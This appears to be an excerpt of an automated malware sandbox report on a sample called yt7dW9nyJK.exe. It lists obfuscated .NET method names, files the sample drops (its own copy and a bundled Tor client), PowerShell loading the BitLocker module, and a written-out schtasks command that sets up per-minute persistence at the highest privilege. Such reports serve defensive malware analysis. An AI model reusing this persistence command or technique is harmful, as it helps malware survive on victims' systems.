Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, NbgqbDZfxTd3FhSpvT.cs	High entropy of concatenated method names: 'yLRE1UCvOh', 'ECiEllMjFP', 'ToString', 'O1dEoTsDIF', 'xxrEaCxlNA', 'l7PEu4kxqH', 'cM9ECgX277', 'rhpEjaqCbr', 'CiQEYKc9Hv', 'CHmE5HyWOL'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, zdH4f3pZmi7p2yCYxr.cs	High entropy of concatenated method names: 'GMS27pPDVk', 'W9S2T6QG6J', 'W4Y2VIGNsX', 'mcA2o6EFWh', 'kLt2aiSiRV', 's6b2CfKRSP', 'sIC2jWDSn5', 'ds6UbPmWGq', 'ntYUt3svsJ', 'PsQUxceNFm'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, oXGlh9FSyLkQpmpfLu.cs	High entropy of concatenated method names: 'MTCufcZTvO', 'NLsugyf3Eg', 'GuvuwFipOO', 'GrIuF13IR0', 'wG2uNw11e8', 'ouou4YmcdU', 'nOluEX9uIq', 'F4quUKVEoE', 'GE0u22hFAC', 'cXauPjbimg'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, olC9lOqWPHK88HFMTE.cs	High entropy of concatenated method names: 'YJ9ragJM3', 'anbfEj16D', 'zOlgfviRF', 'rqlQEadjb', 'cVGF9J5p7', 'y1cm5DtEO', 'g0rVuWbOsq7VjDtaMV', 'qtv2YGJBDSBaQby2wS', 'AEtUabICU', 'sRFP2SGhQ'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, dsMWdeSqEmuJJIBpLr.cs	High entropy of concatenated method names: 'CG0YBu00KD', 'zklYJyL38P', 'KQ6YrL2JU1', 'fITYfrhZoZ', 'TtXYyIIJMn', 'BSiYggur3S', 'lQMYQGlSbT', 'ed3YwddFDb', 'tSuYFECl2w', 'JfnYm7ycax'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, uU2UPPwPJLQsRsHPyp.cs	High entropy of concatenated method names: 'K8bakFXkKZ', 'aHZadickmp', 'F4aaMf64eX', 'BhIaZk8UTC', 'ibwahgO6O0', 'JLJasXs2PT', 'SeKabawUaj', 'wQBatoCFQq', 'UbBaxeEIXK', 'ewqapcLkl4'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, nKKY7Tt52faTCddFBg.cs	High entropy of concatenated method names: 'SBSUo1KaLl', 'JE4UaZaCdk', 'pHRUuVjdHy', 'Y9QUCR08uL', 'k0XUjatQUA', 'z1BUYn0NLC', 'hdeU5tSjgW', 'c84UAqCl8X', 'Oa8U1SNUH9', 'VN8UloAy0X'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, JMKYPcVyVq6QH7wK0M.cs	High entropy of concatenated method names: 'AwK7YU2UPP', 'sJL75QsRsH', 'NSy71LkQpm', 'YfL7luvQhm', 'DW47N7VHoO', 'lA874rKYot', 'DykncXe1DPyJNrZiSR', 'RtCXchC4o1b5pCmxSd', 'dES77nfkCG', 'CQc7TMUTS0'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, vQhmVZmG0JZtewW47V.cs	High entropy of concatenated method names: 'PBHCyScG2K', 'JkJCQwxVgH', 'Pu3uXEEA6t', 'TcQuRNvpPU', 'HOTuOoMn6N', 'JPluHiqT6D', 'fG8u35ZDOj', 'wM1uItaaPe', 'EBvuSXEuTi', 'onHu99LD9d'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, wShyhrkNG0qWJND3Sv.cs	High entropy of concatenated method names: 'lnMN9CUUus', 'nTBNiSvUGg', 'jlWNkM5fGF', 'QsENdIWUnL', 'OdtNevoXJb', 'YcbNX7aqsq', 'Kw7NRMGqP5', 'KO1NOeGo6v', 'C4vNHmaiky', 'SkuN3wGLFh'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, G3L0NIMHLFjsoLjt29.cs	High entropy of concatenated method names: 'ToString', 'pSJ4naaqUe', 'GvO4eiBVS5', 'yiQ4XEVtpL', 'D7y4R3S8HV', 'GtW4OCnx3H', 'PEx4HJ37AP', 'WU343KoRJs', 'OsW4IFdY78', 'YE14Slpm0l'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, KoO1A80rKYoteG0Jem.cs	High entropy of concatenated method names: 'D6JjLOwBIV', 'sRQjaXeeFx', 'frsjCDARpR', 'Tj9jYDhiqR', 'gLFj5U9Zfv', 'xoIChs4tMH', 'HcHCsU1kvt', 'bT0Cb00YIx', 'CehCtdLHex', 'cXwCx2dAnj'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, wqc7bO7TnM3ZX08JehS.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zjYPkP66Zs', 'm0EPdc6DZB', 'm5IPMN4xnB', 'MRxPZOTs7K', 'zrhPhcLC67', 'ItsPsfhAoc', 'Y6mPba9wcO'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, nlGFpdxwrdyqFjguXl.cs	High entropy of concatenated method names: 'zlVU0MQN0c', 'x3BUepLnuX', 'amtUX2mlr8', 'HwaURh0qSQ', 'SnBUkcCZQp', 'gy2UOSaxAg', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, AdPDqvax914xQbRvHH.cs	High entropy of concatenated method names: 'Dispose', 'JGk7xaFTe6', 'HRNqemSJwU', 'UnZRRN7Sk1', 'dlK7pKY7T5', 'sfa7zTCddF', 'ProcessDialogKey', 'xgWq8lGFpd', 'Drdq7yqFjg', 'hXlqqrdH4f'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, asEp2FfC6uaqQkU7N03Xi7aMe7aH4UsqyvczX1pV8VNDEBWL6.cs	High entropy of concatenated method names: 'j9pYh7fqUtxAzfvnbuJUiOYCEky35MZza4ejy2YYNk96bR44B', 'q1AkQ9L5Ua31gmqDu5aPF3y22uEixfb6ZlGjhoexTZd0qLmZh', 'XXD17AbScLYXpeQx98rahzkAsurbeSScr7tDFtieaoG0hQF5K', 'KL3JvinUZD63lB8cBE5fll4PbD', 'hYodKkMjQwXPC9IRhVwgMwm9D5', 'M56aYRhAnyH1lN7hW7LmazOpIC', 'xtOX9br7PfuNPsxA9oqCuKteVy', 'SSi8CSEb2hT4pPBGrikeSsnWAQ', 'zHefGITeBicsks60NE9F5AYnfi', 'qldqlcyo8chVirjGfIBaIl2z2k'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.cs	High entropy of concatenated method names: 'ieoX6VrIxwtQ0f6IPxj01vCOfctxZ5l6ZE0NvjtWknPtwpRYdYVzrRYWzPIGg8WIpwMdndemoXhCbI312', '_38BK1I5SoyOeEOjEuO7IxVars2OjcCgHsEjdqW3FfcNI2nSdSoA6Ny145ZLv2Y3QgnwJUsVZr65zqEbwl', '_86Z1aL9PQfmCZRDJ4oCkARjvaFgfIzRELcAJ1Nc2Iya8HtkxUzVCRA51ZAwGkCudIKGTEzLPQ8p5E1aJL', 'Mps3WRSJwGfNLmVfvSnuZNM6KiMx9FTS0JuyrnTow0MedbgjopKaGEuXs8Qd6ua0ITPnSn0i4FjTd2utM'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, RHrnabkqggf8x5IBqT2LD4ylWiCt2ceO1BQW7adWJ6d509VvOr5xQjaZtlyl9w24v2t1BcynkEhMKVNrepe12LKHR.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'AmkRhiq4pVi2iBvBtP2Bwybsvw65KyK3nCe2860OnGUeTrID2BvBcIVUop8t2pCQvdZOFbzoqsT8FrjSv', 'nJI63nP0qabprjzbDKLQTo24cK9H5b9buvOuCJHijpfhJxmY3YhhQJN2VvGF49INiiJZJkXYitl4O0M8f', '_8srhG0pKEeotPLJFpLjfJZfJIBLhT6CIGM5JqaWtOsFmkiSNqU3ceC9ZHGaCZxsYf5CHU5wwo5s5AElzL', '_6SZXnXIgpwUuaKA1cu8jnBIxvt2YcOEh500Uas57Q5zd2UXkdXEZZatZP9tV5tPpLuTtJNujdJ8bTSYhR'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, TObVbKys0GgFW4VOqJ2ZBssSxFQuDu4.cs	High entropy of concatenated method names: 'qUJlaYtxtF3DbhjY', '_99flffu2gimXsrEvebANqrnCeLyGXDPlUR2jFNroY7z0SkWIpjEoL9v1wLRRFYStaERNXiDzM7KYmJrepx36sjnte70k7yL9GR', 'HOwVothBZbpt3MhCNzc7vZd4HU9mMZAhgshlneBdv2h5ZbK9DFVm3a2qSrciZ0OwL8Oot59rmHBc6yFuLEOTTygwL43snDyxD6', 'YlFRwAvV4R41VmGHmOT32RhVbtjp7b27d3dxRiFkqlcbCluFZexiefjrnsuljXYiTSB9yEbjVHaDopCdVjsydlt8udD1Sk5pmK', 'jcnMb4QQhDa5eCURI8L9eKMDayfrk94eDSxDyXY75Sxcgu1P5dwYXn8DvDfYnXcmvhNdVZSEprhGsDr7cLdf0KQEFyVB0nTWYy'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, FNmlZ2aTo37rTj5achFuQvwVWWjwciW.cs	High entropy of concatenated method names: 'bE6Skcym1E8q1JpQvrrx3A2mPNyEYmA', '_48a39vrGguHmHwaVwCYAXZzl4LFopMc', 'KCB2eIA3VC5QdcTQ7vcWdKgaQ7sBGeN', 'sfRlsl7nZqZfuf0SM1QN7yUx75H53Rh', 'XqXnqcxyHckdUfZccMZiGWEtvihJFaC', 'CumF6z080eUonkPpjiEt8hXsb7DITXb', 'n1xP1ZOmmaiWJwC1ugklwqoJ9HSjjAZ', 'kwM3uET4iWbN6eslWcLIYG7tJxzzeK0', 'Xff0w9u7Bfzj323rrg1udqMDCrc859R', 'Hv0sdAhGuJ7WgE8AEe4vW19hUFftosp'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, I04X8xDLq2CNC4Xt.cs	High entropy of concatenated method names: 'L5f6jbsrgh8yYymy', 'ggsKYphZwRQlM9am', 'Ph8AevJTp2T7ku20', 'IZCHUE2BDP769cUK', '_30rMMePn4gqbT3MH', '_6HZ8rTmwlKI6LdOE', 'r6MU5kcfW4EjU7lv', 'dCKW9WrLdnh9EaZV', 'cCVgQOQCfSUo347X', '_46XjgzRDLUSXjJjo'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, 46Vktqg7CAqVoJ3pXlNy6niu94YrpPriQQA765ga1y8jmqBJ9nrC0PNeoqVxX5rB8GTaZOIbxholzAhW49uLNc62H.cs	High entropy of concatenated method names: 'QS5snepBdQqcCOHSQp7wjYIBy9LdLD9JeyjCxuIbYWVwJ8jOguYWzcEYOC4LkBruRMAZhszhYztkH84KxhUkBmDzV', '_8VMPhDzpud4K0D4TquEusHJXknWPp7fke5kLaX1wtC0z6RrzbmqhggU9TgpCzBalnWms12hoRs1GdRw6jJwpKDU0Q', 'YBwBC1vWAUZiHjfk8nlWB5TcSRA3oPClfq6cPLrfFkoZD0CwZLN6fcGYrg2DOmIWL8fXIbXVLEWwreT4mJumY5zT7', 'zSUF79XylEJaKsEdJqtLmyb0MSbrsRFB8XsPazAu1IuUs2ZXHZkJGI31Vr4YG4yWGX1UfDD2SFJAv7sVINYQS9IW4', 'nqyYJVzhH9i1KcWmyuaLVZXlO6uZcbtvsbE9b2Y0AKTbQisK6v8LvtwrKfkcKfpCz3z567Dtj9DC5UsxsdkEN6ava', 'dCvu9PJyf7MfVS1Npc3fjhG4LSnT13v7ZN2PeUNDI9POEyjyIRUvYcaF3ABpvbu33ocVz90ihZhBEfF5BN74LMJSJ', 'JT9wDkQa6v6BdWcpbWa9WMRL3vomRHBYI0vfMhCmDg6lI1Ww2tVtA3m7AzfQA8flQbppxXKI3INXriEyYsqCUqVSq', 'SqFODOrdzvoFFQEH3vzqJpRU1o5IAywpH5Vy0K3IWfcxtEZpgEmkrLtqIsjRSB9QFq7ByCwUKbdO9S9hhRn7HeYHX', 'pGosDhHzyNeePTKPyTwr9m1xQ7KPu7GqfgyuwDSXCMZXF9hdeckF9CRPraIcI2VjcsGqlCzItThdntkZfUi85xgYx', 'KVcOKWHq70Jo70xfPEvBXDyLWzeapKnSm6ZqpwSQo4jmCd3aG92qkTHeMx612ghHxliNVcFiSakEsgUs2CX9VXuqS'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, IklJR9Egrci7AkoDGmrtlQz9KpfApOw.cs	High entropy of concatenated method names: 'Poc96CYK8OSv52z26hmXZfOp7tWv8TF', 'ExuBL3pMYZSl9913WmNbxDZhYMOjBN6', 'ecPnLK2QepjkslfNCNM1nmU9Zaz6qQu', 'rOn9thVJbMyWyrQ7urXne23OOfLKV2DnfdDEKYSs33EFmusn9TAHdExLeOqe0WnzQ0W3yUxX3hlrORKwlSbnSbxfYxFny93zD2', 'n1Kt8jjnVKwMzP4XvhIWNdjNoiHo380FoO5AfnzYBQsb2S5BSVVwbEgpADjXymXkk2K5MFA1JwtoQOkD2maMetNhc4ey4z0sra', 'bNvU1zkRVYVglK41nyb6EyKDl0mRGa5rSs56jXXGb5FkVeHpLeAaWAX3uXAbHPkPKIXiAkmCO5YJNWmTBPOmEEmQvsRvVEAT3J', 'EaUqAvoIBKIqK7lROQeEZKTApSVnfkl3jzK0Gs3HoXgVMEZssVglXUsgK8TOUzDwElRPPqWHnWsQlL2JNoOtI4Oo16AdBQ5lPa', 'GWSgsyBxh2AdxW4HIL87cGlfJCD1VRlsSaUSET9aSS7BZJXNTWSzviaSJHzSRN2HATJlo9RkRUlsrN32NWN0oocgt12kBeBEIN', 'dQojCAMlnWTBRn4ep59rv6Yy8JDR8lKfOz8mGgStmHyugnuDELiXXOy98H1uqD69PCfzjXK5L7IvLA9RXX6r9f4YruF6Ylwfgc', '_9Q0ogs17qwzhJbUyXr16HTr3BRGn4QvnoHycknKeIUDOFNZVnxlnQr5ljgSNWmkKwKTVjpEqIiDYjAKNpdwaApjPDu4jGxpZL5'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	High entropy of concatenated method names: 'f6umHbcSKUEeCW91ooOAfJl9PjsmMaH', 'wkAIiThNH8epac4Ok3Gy0sk1E1UyokG', 'mJQi8aQlYBH680bsbDAcLkSWUticyzq', 'YDaJPmh0IV3zBUCXDBCT901fLwqEdOm', '_5MZAwH4gj3KSlo2yJJoL5thDudhywuf', 'gha1t9V6cwzsPueRtGncNgrVjVWduZI', 'RmzNMxHPsPlMoCYGw4xljeH3pUmG1D1', 'vKORDnbaXqyihIjqVcVn6FuJuirt36x', 'e0socU8SbuUz6ZcaJsyGEJcP8BpPuea', '_9kxN9kzg5bQyCJ2LwwMR8FggoKWuSzf'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, rlPW4lL6JzpBKG5uTpUgtMKAdxQudep.cs	High entropy of concatenated method names: 'kBIJXv5a6rottIG83i4vMNxD8FeQAsJ', 'UXPzojRBKx1Oqz9xM4hqjeBMRGFhilZb0DpPekrUZrUFBwX4Z6QKRfIR8Q6VLG5yCxn4FdHJAk7DF12DySdVEngK8AbS6420Ua', 'N93RaNm3kVfs5sBwuxwa1snrEURzE4gpyKg3PFeRmsWQ9grkjjjD6u8KC4NOAbTgcEFuj1CrJWLrxbiBtYbrDDtY1SSUUupQr9', 'XGroXQIR91D3l4CCUv1lCuJWuRjTdcWOzPqUdCqRyHMdqmHUR0ueHXMI2rBwVL1VXstJIcfgV1hQJu7FIn7U6ueRyPjsNM3EI2', 'BqnIh4cGt3g5rOqBfzaULbx9adX0obHUPSD6WWd285Qc4G9Lax9PXlcBSFQtHOvaF5dDdTN9DNl6QLUPu8fh16LhQmfiOzzPBt'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, MoLs8m78ESt4YD6gORW.cs	High entropy of concatenated method names: 'PX12BvorUO', 'C4o2JnRMQh', 'r2L2r7xD58', 'toN2fC5Wen', 'YMg2yltSHY', 's1P2gc5u0a', 'PWX2Qp3X1W', 'LWj2win8h0', 'o2K2FopRZZ', 'h6t2mTw3Y4'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, FNiqGIzN6YouuO6eE2.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Bdy2WxTA4N', 'BMG2N8BmFA', 'p7v24wIujM', 'A202E0YrFb', 'LIi2Uka6SE', 'c1A22ykXVi', 'G202PAVMZa'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, LjKFJcGnQbFpADmDEj.cs	High entropy of concatenated method names: 'km2WwQ70in', 'y6xWFdr0d8', 'aoDW0AmBUt', 'SLBWeXlsfN', 'RaMWRNdhd2', 'eBWWO26XOQ', 'DZnW3ueKDe', 'Jg9WIFHQLi', 'Q1gW9oB2HQ', 'FyUWn6yR51'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, h82OGR39MMrSWBIeuA.cs	High entropy of concatenated method names: 'aQCYodnlRF', 'QcKYuyexsS', 'v5bYjPCIvt', 'ofQjpcyWju', 'y63jzfsrE2', 'kkTY8hPSeq', 'sguY7BnRpi', 'jGvYqKWso0', 'clHYTi8Zkj', 'iNTYVb7tjV'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, l34GXL5vNW82bgMJ5l.cs	High entropy of concatenated method names: 'UF1TLxvbsG', 'oysTolclHI', 'BciTa0ISyD', 'gMaTu3KLgD', 'CxLTC6iOoQ', 'HYwTjIQnLJ', 'Ta4TYGZ5Bn', 'CXdT5eNhSg', 'e1wTA0Rfac', 'JKuT1oA9rK'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, NbgqbDZfxTd3FhSpvT.cs	High entropy of concatenated method names: 'yLRE1UCvOh', 'ECiEllMjFP', 'ToString', 'O1dEoTsDIF', 'xxrEaCxlNA', 'l7PEu4kxqH', 'cM9ECgX277', 'rhpEjaqCbr', 'CiQEYKc9Hv', 'CHmE5HyWOL'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, zdH4f3pZmi7p2yCYxr.cs	High entropy of concatenated method names: 'GMS27pPDVk', 'W9S2T6QG6J', 'W4Y2VIGNsX', 'mcA2o6EFWh', 'kLt2aiSiRV', 's6b2CfKRSP', 'sIC2jWDSn5', 'ds6UbPmWGq', 'ntYUt3svsJ', 'PsQUxceNFm'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, oXGlh9FSyLkQpmpfLu.cs	High entropy of concatenated method names: 'MTCufcZTvO', 'NLsugyf3Eg', 'GuvuwFipOO', 'GrIuF13IR0', 'wG2uNw11e8', 'ouou4YmcdU', 'nOluEX9uIq', 'F4quUKVEoE', 'GE0u22hFAC', 'cXauPjbimg'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, olC9lOqWPHK88HFMTE.cs	High entropy of concatenated method names: 'YJ9ragJM3', 'anbfEj16D', 'zOlgfviRF', 'rqlQEadjb', 'cVGF9J5p7', 'y1cm5DtEO', 'g0rVuWbOsq7VjDtaMV', 'qtv2YGJBDSBaQby2wS', 'AEtUabICU', 'sRFP2SGhQ'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, dsMWdeSqEmuJJIBpLr.cs	High entropy of concatenated method names: 'CG0YBu00KD', 'zklYJyL38P', 'KQ6YrL2JU1', 'fITYfrhZoZ', 'TtXYyIIJMn', 'BSiYggur3S', 'lQMYQGlSbT', 'ed3YwddFDb', 'tSuYFECl2w', 'JfnYm7ycax'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, uU2UPPwPJLQsRsHPyp.cs	High entropy of concatenated method names: 'K8bakFXkKZ', 'aHZadickmp', 'F4aaMf64eX', 'BhIaZk8UTC', 'ibwahgO6O0', 'JLJasXs2PT', 'SeKabawUaj', 'wQBatoCFQq', 'UbBaxeEIXK', 'ewqapcLkl4'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, nKKY7Tt52faTCddFBg.cs	High entropy of concatenated method names: 'SBSUo1KaLl', 'JE4UaZaCdk', 'pHRUuVjdHy', 'Y9QUCR08uL', 'k0XUjatQUA', 'z1BUYn0NLC', 'hdeU5tSjgW', 'c84UAqCl8X', 'Oa8U1SNUH9', 'VN8UloAy0X'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, JMKYPcVyVq6QH7wK0M.cs	High entropy of concatenated method names: 'AwK7YU2UPP', 'sJL75QsRsH', 'NSy71LkQpm', 'YfL7luvQhm', 'DW47N7VHoO', 'lA874rKYot', 'DykncXe1DPyJNrZiSR', 'RtCXchC4o1b5pCmxSd', 'dES77nfkCG', 'CQc7TMUTS0'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, vQhmVZmG0JZtewW47V.cs	High entropy of concatenated method names: 'PBHCyScG2K', 'JkJCQwxVgH', 'Pu3uXEEA6t', 'TcQuRNvpPU', 'HOTuOoMn6N', 'JPluHiqT6D', 'fG8u35ZDOj', 'wM1uItaaPe', 'EBvuSXEuTi', 'onHu99LD9d'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, wShyhrkNG0qWJND3Sv.cs	High entropy of concatenated method names: 'lnMN9CUUus', 'nTBNiSvUGg', 'jlWNkM5fGF', 'QsENdIWUnL', 'OdtNevoXJb', 'YcbNX7aqsq', 'Kw7NRMGqP5', 'KO1NOeGo6v', 'C4vNHmaiky', 'SkuN3wGLFh'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, G3L0NIMHLFjsoLjt29.cs	High entropy of concatenated method names: 'ToString', 'pSJ4naaqUe', 'GvO4eiBVS5', 'yiQ4XEVtpL', 'D7y4R3S8HV', 'GtW4OCnx3H', 'PEx4HJ37AP', 'WU343KoRJs', 'OsW4IFdY78', 'YE14Slpm0l'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, KoO1A80rKYoteG0Jem.cs	High entropy of concatenated method names: 'D6JjLOwBIV', 'sRQjaXeeFx', 'frsjCDARpR', 'Tj9jYDhiqR', 'gLFj5U9Zfv', 'xoIChs4tMH', 'HcHCsU1kvt', 'bT0Cb00YIx', 'CehCtdLHex', 'cXwCx2dAnj'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, wqc7bO7TnM3ZX08JehS.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zjYPkP66Zs', 'm0EPdc6DZB', 'm5IPMN4xnB', 'MRxPZOTs7K', 'zrhPhcLC67', 'ItsPsfhAoc', 'Y6mPba9wcO'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, nlGFpdxwrdyqFjguXl.cs	High entropy of concatenated method names: 'zlVU0MQN0c', 'x3BUepLnuX', 'amtUX2mlr8', 'HwaURh0qSQ', 'SnBUkcCZQp', 'gy2UOSaxAg', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, AdPDqvax914xQbRvHH.cs	High entropy of concatenated method names: 'Dispose', 'JGk7xaFTe6', 'HRNqemSJwU', 'UnZRRN7Sk1', 'dlK7pKY7T5', 'sfa7zTCddF', 'ProcessDialogKey', 'xgWq8lGFpd', 'Drdq7yqFjg', 'hXlqqrdH4f'

Drops PE files

Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\zlib1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libssl-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libgcc_s_sjlj-1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent_extra-2-1-7.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent_core-2-1-7.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libssp-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	File created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libwinpthread-1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Jump to dropped file
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	File created: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-gencert.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent-2-1-7.dll	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
